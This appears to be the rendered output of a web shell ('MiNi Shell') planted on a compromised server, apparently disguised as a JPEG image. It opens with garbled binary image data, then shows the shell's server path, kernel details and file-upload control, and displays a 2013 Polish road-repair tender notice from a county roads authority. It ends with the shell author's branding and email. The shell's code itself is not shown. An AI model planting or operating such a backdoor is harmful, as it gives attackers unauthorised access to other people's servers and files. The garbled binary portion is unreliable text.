JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130726/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130726/151183-N-2013.html

<p class="kh_header"><b>Chrzanów: Naprawa uszkodzonego korpusu DP 1024K- ulicy Belęcińskiej w Płazie wraz  z wzmocnieniem konstrukcji  i  zmianą sposobu odwodnienia.</b><br>
<b>Numer ogłoszenia: 151183 - 2013; data zamieszczenia: 26.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg w Chrzanowie , ul. Grzybowskiego 7A, 32-500 Chrzanów, woj. małopolskie, tel. 32 6231272, 6234687, faks 32 6231272.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Naprawa uszkodzonego korpusu DP 1024K- ulicy Belęcińskiej w Płazie wraz  z wzmocnieniem konstrukcji  i  zmianą sposobu odwodnienia..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZAKRES:
Obsługa geodezyjna - tyczenie i wykonanie dokumntacji powykonawczej - 1komplet,
Prace rozbiórkowe przygotowawcze - wyrównanie wyłomu muru kamiennego, rozbiórka muru na części powstałego wyłomu na szerokości pozwlajacej ponowne ułożenie i liniowe wykoanie poprawne muru ( szerokość ok. 5.50 m.b) mur wysokości 3.50 m - 5,5m.b,
Prace rozbiórkowe drogowe - rozbiórka nawierzchni na szerokości i długości oznaczonej na rysunku, wraz z rozebraniem podbudowy do ułożenia nowej zgodnie z proponowanej w rozwiązaniu projektowym głębokość ok. 70.0 cm od poziomu istniejącej nawierzchni - 36,9m2,

PRACE KONSTRUKCYJNE - ZABEZPIECZENIE PIONOWE.
Wykonanie mikropalowania - pale wiercone średnicy 250 mm - ze zbrojeniem z kształtownika gorącowalcowanego HEB 140 (St3SX) - pale uzupełnione zaczynem cemenowym pod ciśnieniem - pompowanie mechaniczne 20 Atm. Wiercenia do głębokości zakotwienia ok.1.5 w rumoszu skalnym. Wraz z wykonaniem niezbędnych normowych obciążeń pali, opracowaniem metryk pali oraz kart kontrolnych ciągłosic betonowania. - 100m.b,
Wykonanie oczepu żelbetowego zbrojonego - deskowanie oczepu wraz z usawieniem deskowanie wykonaniem i montażem zbrojenia, betonowanie z zawibrowaniem i wykonanie wykończenia powierzchni poprzez szlifowanie i pokrycie środkiem uszczelniającym powierzchniowo. Beton konstrukcyjny C25/30 z dodatkiem środka czynnego PENETRON. Malowanie powierzchniowe PENETRONEM x 2. - 11,52m3,
Wykonanie zbrojenia oczepu żelbetowego - stal zrojeniowa zgodnie z rysunkami projektu pręty żebrowane stal A-IIIN RB500W - śr. 20,  - 1,3t,
Montaż barieroporęczy mostowej wzmacnianej typu BB - ze słupkami w rozstawie 1.0 m mocowanej do oczepu kotwami systemowymi KM-1, M20 -  18,5m.b,
Wykonanie podbetonu C25/30 - na istniejącej powierzchni istniejącego muru kamiennego - 1,85m3,

ROBOTY INSTALACYJNE - OSUSZENIE I ODWODNIENIE TERENU.
Wykonanie ciągu drenarskiego (północno-zachodnia) strona jezdni wraz z wykonaniem wpustu drogowego kanalizacji deszczowej. Rura drenarska 126/113 w obsypce kruszywem łamanym z zabezpieczeniem geowłókniną 70x50 cm. - 25m.b,
Wykonanie ciągu drenarskiego(południowo-wschodnia) strona jezdi wraz z wpięciem do studni kanalizacyjnej zbiorczej. Rura drenarska 126/113 w obsypce kruszywem łamanym z zabezpieczeniem geowłókniną 70x50 cm.
- 18,5m.b,
Wykonanie ciągu drenarskiego na działce poniżej posadowienia muru kamiennego zgodnie z projektem, wykonanie na terenie zielonym z odnowieniem trawnika do stanu pierwotnego. Rura drenarska 126/113 w obsypce kruszywem łamanym z zabezpieczeniem geowłókniną 70x50 cm - 21m.b,
Połączenie wpustu deszczowgo ze studnią kanalizacji zbiorczej za pomocą przewiertu sterowanego pod podbudową jezdni, z wykonaniem kaskady zewnętrznej w miejscu włączenia do studni. Przyłączenie wykonane rurą kanalizacyjną śr. 200 mm typ PVC - SN8. - 10,5m.b,
Wykonanie studni zbiorczej z kręgów żelbetowych śr. 1000.0 mm o głębokości 3.3 m z nadstawką prefabrykowaną śr.400.0 mm wysokości ok. 0.90 m i włazem żeliwnym klasy D 400 - montaż w obecnej wyrwie muru. - 1komplet,
Wykoanie połączenia studni zbiorczej ze studzienką zbiorczą dolną drenażu oraz studzienką rozdzielczą drenażu rozsączającego. Rura PCV -SN8 śr.200.0 mm - 11m.b,
Wykonanie studzienki zbiorczej odprowadzającej wody opadowe do drenażu śr. 420.0 mm  - 1komplet
Wykonanie studzienki rozdzielczej drenażu rozsączającego drenażu śr. 420.0 mm  - 1komplet,
Wykonanie rozdzielczych ciągów drenarskich - rury drenarskie w otulinie z włókna syntetycznego w obsypce 50x50 z kamienia łamanego jako złoże rozsączające oraz wykonaniem zabezpieczenia z geowłókniny - 33m.b,

ROBOTY DROGOWE - NAWIERZCHNIA JEZDNI I CHODNIKA ZABEZPIECZENIA.
Wykonanie pobocza utwardzonego z nawierzchnią tłuczniową ( północo-zachodnia) strona jezdni nad wykonanym wczesniej ciągiem drenarskim wraz z zagęszczeniem utwardzeniem i wykończniem- 25m.b
Montaż na długości modernizowanego odcinka korytka odwadniającego betonowego na podbudowie betonowej z betonu podkładowego gr.10.0 cm - 25m.b,
Wykonanie podbudowy nawierzchni na modernizowanym odcinku jezdni w dwóch warstwach - warstwa z kuszywa łamanego stabilizowanego mechanicznie o śr. 0-63 warstwa dolna podbudowy grubości 30.0 cm oraz warstwa zasadnicza podbudowy z kruszywa łamanego stabilizowanego mechanicznie śr. 0-31.5 grubości 30 cm. wraz z zabezpieczeniem geowłókniną łączenia uskoków warstw - 22,14m3,
Wykonanie warstw asfaltowych - warstwa wiążąca z betonu asfaltowego AC16W gr. 6.0 cm oraz warstwa ścieralna z betonu asfaltowego AC 11S gr. 5 cm na gotowo - 36,9m2,
Montaż krawężnika drogowego betonowego na długości modernizowanego odcinka wraz z ławą betonową.- 18,1m.b,
Wykonanie chodnika z prefabrykowanej kostki betonowej  o szerokości zgodnie z projektem zmiennej ok.1.2 m bezpośrednio na konstrukcji żelbetowej oczepu na podsypce pisakowo-cementowej  - 21,6m2,

PRACE REMONTOWE I ODBUDOWA.
Odbudowa fragmentu muru kamiennego - metodą tradycyjną z kamienia uzyskanego z odzysku materiałów na budowie z uszkodzonego muru (należy przewidzieć do 20 % uzupełnienia straconego materiału) mur na zaprawie cementowo-wapiennej - 5,5m.b,
Uzupełnienie spoin cemetnowo-wapiennych na całej długości istniejącego z ręcznym sztychowaniem i wypełnieniem spoin zaprawą do murów kamiennych MURMIX - 63m2,.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonana metodą spełnia/ nie spełnia w oparciu o oświadczenie dołączone do oferty  (zał. nr 2).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać wiedzę i doświadczenie pozwalające na realizację zamówienia, dlatego też musi wykazać, w formie załączonego do oferty wykazu robót budowlanych ( w zał. nr 4) wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu,            a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, iż w ciągu ostatnich pięciu lat wykonał co najmniej jedną pracę  w technologii przyjętej w ekspertyzie, dotyczącej realizacji odbudowy drogi                   z zastosowaniem mikropali.
Dowodami o których mowa powyżej jest poświadczenie wykonania robót budowlanych zgodnie z załączonym wykazem robót lub - inny dokument- jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia. 
W przypadku gdy wskazana w wykazie robota budowlana była wykonana na rzecz Zamawiającego , Wykonawca nie ma obowiązku przedkładania dowodów.
Wykonawca zamiast poświadczeń, o których mowa powyżej może przedłożyć dokumenty potwierdzające należyte wykonanie robót budowlanych zgodnie z zasadami sztuki budowlanej i ich prawidłowe ukończenie, określone w §1 ust.1 pkt 2 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009r w sprawie rodzaju dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz.U.Nr 226, poz. 1817)
Ocena spełnienia warunku będzie dokonywana metodą 0-1 tj. spełnia / nie spełnia, w oparciu o  dokumenty dołączone do oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonana metodą spełnia/ nie spełnia w oparciu  o oświadczenie dołączone do oferty  (zał. nr 2).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować osobami zdolnymi do wykonania zamówienia, dlatego też musi wykazać, iż posiada osoby zdolne do wykonania zamówienia, to jest załączyć wykaz osób /zał. nr.5/, które będą wykonywać zamówienie wraz z informacjami na temat ich kwalifikacji zawodowych, wykształcenia a także zakresu wykonywanych przez nie czynności oraz oświadczenie /zał.nr 6/, iż osoby te posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień tj. kierownik budowy posiadający uprawnienia budowlane w specjalności odpowiadającej przedmiotowi zamówienia- uprawnienia drogowe.  
Uwaga :Zamawiający akceptował będzie kwalifikacje zawodowe odpowiadające uprawnieniom wymaganym przez Zamawiającego, które zostały uznane w zakresie i na zasadach opisanych w ustawie z dnia 18 marca 2008r o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U.Nr 63, poz. 394 z 2008r). 
Ocena spełnienia warunku będzie dokonywana metodą 0-1 tj. spełnia / nie spełnia,  w oparciu o dokumenty i oświadczenie dołączone do oferty / załącznik nr 5 i 6/.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonana metodą spełnia/ nie spełnia w oparciu o oświadczenie dołączone do oferty  (zał. nr 2).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne dokumenty:
a)Wypełniony i podpisany przez osoby uprawnione lub upoważnione przez  Wykonawcę Formularz ofertowy sporządzony według wzoru stanowiącego załącznika nr 1. 
b)Pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu, z określeniem zakresu reprezentacji , jeżeli oferta będzie podpisana przez pełnomocnika. 
c)Pełnomocnictwo  do reprezentowania w postępowaniu  lub reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego,  w  przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia, podpisane przez uprawnione osoby ( np. konsorcjum).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art.144 Pzp -  Zamawiający przewiduje możliwość dokonania zmian zawartej  umowy w stosunku do treści oferty na podstawie której dokonano wyboru wykonawcy oraz określa warunki tej zmiany w następującym zakresie:
a.zmiana wynagrodzenia umownego spowodowana zmianą urzędowej stawki VAT,
b.termin wykonania zamówienia - może ulec wydłużeniu:
- w przypadku wystąpienia konieczności wykonania zamówienia dodatkowego nie  
   objętego przedmiotem zamówienia podstawowego,  których wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia.
- wskutek wystąpienia niesprzyjających warunków atmosferycznych 
   uniemożliwiających terminową realizację zadania,
- w przypadku wystąpienia nieprzewidzianych zdarzeń losowych, 
 d.  zmiany osobowe - zmiana osób do nadzorowania robót:
       - istnieje możliwość zmiany kierownika budowy oraz pozostałych osób przedstawionych w ofercie przetargowej, za uprzednią pisemną zgodą Zamawiającego.
      - Wykonawca z własnej inicjatywy proponuje zmianę osób o których mowa powyżej w przypadku ich śmierci, choroby, przyczyn niezależnych od Wykonawcy  lub innych zdarzeń losowych .
       - w przypadku zmiany osób o których mowa powyżej , nowe osoby muszą spełniać wymagania określone w siwz dla danej funkcji.
      - Zamawiający może żądać zmiany osób o których mowa powyżej, jeżeli uzna , że nie wykonują należycie swoich obowiązków. Wykonawca dokonuje takiej zmiany w terminie do 14 dni od daty złożenia wniosku przez Zamawiającego.  
e.  zmiany dot.  zadań realizowanych przez Podwykonawcę:
- w szczególnie uzasadnionych przypadkach wystąpienia konieczności realizacji przez Podwykonawcę części zamówienia, której Wykonawca nie wskazał w ofercie, że powierzy ją Podwykonawcy, Zamawiający dopuszcza się możliwość przyjęcia Podwykonawcy w trakcie realizacji zamówienia  z zachowaniem zasad dot. podwykonawców określonych we wzorze umowy.
-zmiana podwykonawcy w trakcie realizacji zamówienia  może nastąpić jeżeli będzie on wykonywał roboty w sposób wadliwy, niezgodny z przedmiotem zamówienia  oraz obowiązującymi w tym zakresie przepisami. Zmiana podwykonawcy wiązać się będzie ze spełnieniem przez nowego podwykonawcę warunków w zakresie nie mniejszym niż spełniał dotychczasowy podwykonawca.
- zmiana podwykonawcy na którego wiedzę i doświadczenie wykonawca powoływał się w celu spełnienia warunków udziału w niniejszym postępowaniu, może nastąpić pod warunkiem iż nowy podwykonawca posiada wiedzę i doświadczenie w zakresie nie mniejszym niż dotychczasowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-chrzanowski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zarząd Dróg w Chrzanowie
32-500 Chrzanów, ul. Grzybowskiego 7a
I piętro, pok, nr 106.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.08.2013 godzina 09:00, miejsce: Powiatowy Zarząd Dróg w Chrzanowie
32-500 Chrzanów, ul. Grzybowskiego 7a
I piętro, pok, nr 110 -sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com